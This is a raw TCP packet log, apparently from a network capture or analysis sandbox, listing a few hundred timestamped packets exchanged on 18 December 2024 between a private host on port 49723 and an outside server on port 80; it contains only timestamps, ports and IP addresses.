Dec 18, 2024 13:38:46.662559986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.663667917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.663769960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.664036989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.664103985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.665088892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.665246010 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.665499926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.665626049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.665879965 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.665939093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.666187048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.666301012 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.667275906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.667295933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.667332888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.667359114 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.668634892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.668692112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.668915033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.668971062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.669809103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.669997931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.670197964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.670262098 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.671092033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.671161890 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.671291113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.671335936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.672575951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.672687054 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.672816992 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.672816992 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.673635960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.673727989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.673788071 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.673842907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.674629927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.674702883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.675012112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.675092936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.675759077 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.675810099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.676019907 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.676083088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.677194118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.677259922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.677381992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.677462101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.678311110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.678324938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.678600073 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.678930044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.679070950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.679107904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.679184914 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.680227041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.680351973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.680510044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.680579901 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.681391001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.681472063 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.681617022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.681714058 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.682816029 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.682941914 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.683104992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.683238029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.683732033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.683861017 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.683938026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.684009075 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.684806108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.684926033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.685077906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.685134888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.685791969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.685866117 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.686105967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.686162949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.686824083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.686922073 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.687043905 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.687165022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.688117027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.688194990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.688273907 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.688425064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.689543962 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.689558983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.689697027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.689697027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.690408945 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.690483093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.690514088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.690634012 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.691720009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.691809893 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.691981077 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.692078114 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.692704916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.692773104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.692868948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.693043947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.693890095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.694008112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.694164038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.694228888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.695067883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.695280075 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.695307016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.695355892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.696317911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.696378946 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.696511030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.696593046 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.697359085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.697416067 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.697638988 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.697715044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.698821068 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.698909998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.699068069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.699217081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.699954987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.700073957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.700638056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.700700998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.700874090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.700923920 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.701191902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.701317072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.702406883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.702420950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.702533007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.703295946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.703408003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.703444958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.703612089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.704480886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.704593897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.704914093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.704972982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.705616951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.705712080 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.705739021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.705806017 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.706726074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.706779957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.707026005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.707081079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.707914114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.707994938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.708163977 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.708234072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.709062099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.709136963 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.709397078 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.709491968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.710302114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.710360050 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.710442066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.710495949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.711405993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.711539984 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.711678028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.711779118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.713206053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.713263035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.843466997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.843599081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.843641043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.843801022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.844038963 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.844096899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.844255924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.844317913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.845297098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.845449924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.845529079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.845602036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.846518040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.846580982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.846844912 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.846909046 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.847909927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.847975016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.848359108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.848429918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.849486113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.849569082 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.850012064 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.850097895 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.850385904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.850523949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.850609064 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.850666046 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.851425886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.851510048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.851634026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.851691008 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.852366924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.852468014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.852762938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.852823973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.853585958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.853709936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.853898048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.854137897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.854872942 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.854891062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.854974031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.854974031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.855705976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.855859041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.855870962 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.855917931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.856856108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.856949091 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.857215881 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.857274055 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.858566046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.858578920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.858653069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.859283924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.859342098 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.859574080 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.859625101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.860443115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.860537052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.860737085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.860841036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.861823082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.861985922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.862122059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.862231016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.863075972 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.863087893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.863305092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.864272118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.864291906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.864423990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.865151882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.865297079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.865442038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.865509033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.866456985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.866527081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.866568089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.866693020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.867501020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.867624998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.867861032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.867921114 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.868808031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.868879080 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.869059086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.869133949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.870075941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.870093107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.870204926 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.870204926 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.871062040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.871161938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.871726036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.871814013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.872070074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.872195959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.872282028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.872353077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.873295069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.873377085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.873615980 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.873717070 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.874525070 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.874609947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.874855995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.874967098 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.875813007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.875912905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.876209021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.876269102 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.876837015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.876913071 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.877528906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.877648115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.877943039 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.878151894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.878339052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.878339052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.879131079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.879345894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.879352093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.879695892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.880657911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.880676985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.881143093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.881143093 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.882152081 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.882169008 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.882997990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.883002043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.883332014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.883605957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.884651899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.884668112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.884737015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.884737015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.884737015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.885174990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.885545015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.885915995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.885915995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.886499882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.886517048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.887331009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.887331009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.887798071 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.888062000 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.889038086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.889066935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.889152050 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.889152050 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.889152050 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.889152050 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.889836073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.889853001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.890141964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.890857935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.890965939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.891333103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.891333103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.891947985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.892122030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.892450094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.892450094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.893213987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.893398046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.893882036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.893882036 CET	49723	80	192.168.2.8	31.41.244.11
